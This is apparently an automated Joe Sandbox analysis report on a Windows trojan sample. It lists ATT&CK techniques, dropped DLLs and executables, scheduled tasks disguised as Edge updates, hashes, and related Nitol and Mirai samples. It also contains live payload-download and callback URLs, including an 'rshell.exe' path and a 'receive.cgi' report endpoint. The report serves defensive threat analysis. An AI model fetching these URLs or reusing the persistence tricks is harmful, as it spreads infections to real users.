Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	32 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
149876985-734579485.05.exe	7%	Virustotal		Browse
149876985-734579485.05.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\YYAfLM\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\1pZu9Rh\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\YYAfLM\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\1pZu9Rh\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	0%	ReversingLabs
C:\Program Files (x86)\YYAfLM\YYAfLM.exe	0%	ReversingLabs
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\Documents\RgZ5EJ.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://khec3y.oss-cn-beijing.aliyuncs.com/4	0%	Avira URL Cloud	safe
http://toro.d.dooo.jp/index.html)k0	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-1002rshell.exe	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002rshell.exe	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/i.datl	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifgc	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif.	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif(y	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifCert.cr	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifcate	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifcrosoft	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifRoot	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/c.gifCert.cr	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/l	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/v	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-10025	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif8	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifJ	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifhttps://khec3y.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifo	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifd	0%	Avira URL Cloud	safe
http://toro.d.dooo.jp/report/receive.cgi?exe=ClockPod	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifl.aliy	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifgc	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifP	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
http://toro.d.dooo.jp/index.htmlTORO	0%	Avira URL Cloud	safe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifo	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	high
khec3y.oss-cn-beijing.aliyuncs.com	59.110.190.21	true	false	unknown
gnkygm.net	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51	RgZ5EJ.exe, 00000006.00000003.2891470624.0000000003FFD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dll	YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false		high
http://%s/%d.dllC:	YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/4	149876985-734579485.05.exe, 00000000.00000003.2239671377.0000000000610000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.0000000000608000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-1002rshell.exe	149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	RgZ5EJ.exe.0.dr, 189atohci.sys.0.dr	false		high
http://toro.d.dooo.jp/index.html)k0	149876985-734579485.05.exe	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002rshell.exe	149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/i.datl	149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/	149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifgc	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifCert.cr	149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif.	149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif(y	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifcrosoft	149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifcate	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifRoot	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/c.gifCert.cr	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-10025	149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	RgZ5EJ.exe.0.dr, 189atohci.sys.0.dr	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/l	149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/v	149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifJ	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	RgZ5EJ.exe.0.dr	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifo	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rarC:	YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifhttps://khec3y.oss-cn-beijing.aliyuncs.com/b.gifhttp	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.micro	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2144209470.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2144422802.0000000000659000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://toro.d.dooo.jp/report/receive.cgi?exe=ClockPod	149876985-734579485.05.exe	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	RgZ5EJ.exe.0.dr	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif8	149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifd	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txt	YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifl.aliy	149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifgc	149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifP	149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false		high
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifo	149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://toro.d.dooo.jp/index.htmlTORO	149876985-734579485.05.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
59.110.190.21	khec3y.oss-cn-beijing.aliyuncs.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
8.210.209.78	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590025
Start date and time:	2025-01-13 13:52:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	149876985-734579485.05.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@64/29@9/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 59% Number of executed functions: 12 Number of non-executed functions: 119
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target YYAfLM.exe, PID 5212 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:54:25	Task Scheduler	Run new task: UOm04 path: C:\Users\user\Documents\RgZ5EJ.exe
12:55:49	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 4ZjvY path: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe
12:55:49	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 999pz path: C:\Program Files (x86)\YYAfLM\YYAfLM.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
118.178.60.9	13478674376-78423498.01.exe	Get hash	malicious	Unknown	Browse
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	13478674376-78423498.01.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	118.178.60.9
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	elitebotnet.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	106.14.74.100
	trow.exe	Get hash	malicious	Unknown	Browse	39.99.233.155
	13478674376-78423498.01.exe	Get hash	malicious	Unknown	Browse	47.101.28.195
	3.elf	Get hash	malicious	Unknown	Browse	8.156.156.245
	i686.elf	Get hash	malicious	Mirai	Browse	47.104.110.148
	res.ppc.elf	Get hash	malicious	Unknown	Browse	47.114.43.16
	res.mpsl.elf	Get hash	malicious	Unknown	Browse	8.187.66.138
	6.elf	Get hash	malicious	Unknown	Browse	8.130.209.218
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	elitebotnet.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	8.209.8.36
	https://bnbswap.lakshmi.trading/	Get hash	malicious	Unknown	Browse	8.212.49.60
	https://hmflowcontrols.com/ch/CHFINAL/50477/	Get hash	malicious	Unknown	Browse	8.222.203.130
	3.elf	Get hash	malicious	Unknown	Browse	47.88.121.129
	5.elf	Get hash	malicious	Unknown	Browse	8.220.246.3
	3.elf	Get hash	malicious	Unknown	Browse	149.129.63.242
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	8.210.64.208
	http://www.k03g.xyz/	Get hash	malicious	Unknown	Browse	47.254.186.224
	https://telegramerong.cc/app/	Get hash	malicious	Telegram Phisher	Browse	47.251.98.254
	http://telegramerong.cc/app	Get hash	malicious	Telegram Phisher	Browse	47.251.98.254
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	elitebotnet.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	106.14.74.100
	trow.exe	Get hash	malicious	Unknown	Browse	39.99.233.155
	13478674376-78423498.01.exe	Get hash	malicious	Unknown	Browse	47.101.28.195
	3.elf	Get hash	malicious	Unknown	Browse	8.156.156.245
	i686.elf	Get hash	malicious	Mirai	Browse	47.104.110.148
	res.ppc.elf	Get hash	malicious	Unknown	Browse	47.114.43.16
	res.mpsl.elf	Get hash	malicious	Unknown	Browse	8.187.66.138
	6.elf	Get hash	malicious	Unknown	Browse	8.130.209.218
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	118.178.60.9

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	YYYY-NNN AUDIT DETAIL REPORT .docx	Get hash	malicious	Unknown	Browse	59.110.190.21 118.178.60.9
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	59.110.190.21 118.178.60.9
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	59.110.190.21 118.178.60.9
	13478674376-78423498.01.exe	Get hash	malicious	Unknown	Browse	59.110.190.21 118.178.60.9
	Setup.msi	Get hash	malicious	Unknown	Browse	59.110.190.21 118.178.60.9
	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	59.110.190.21 118.178.60.9
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	59.110.190.21 118.178.60.9
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	59.110.190.21 118.178.60.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	13478674376-78423498.01.exe	Get hash	malicious	Unknown	Browse
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe

Download File

Process:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
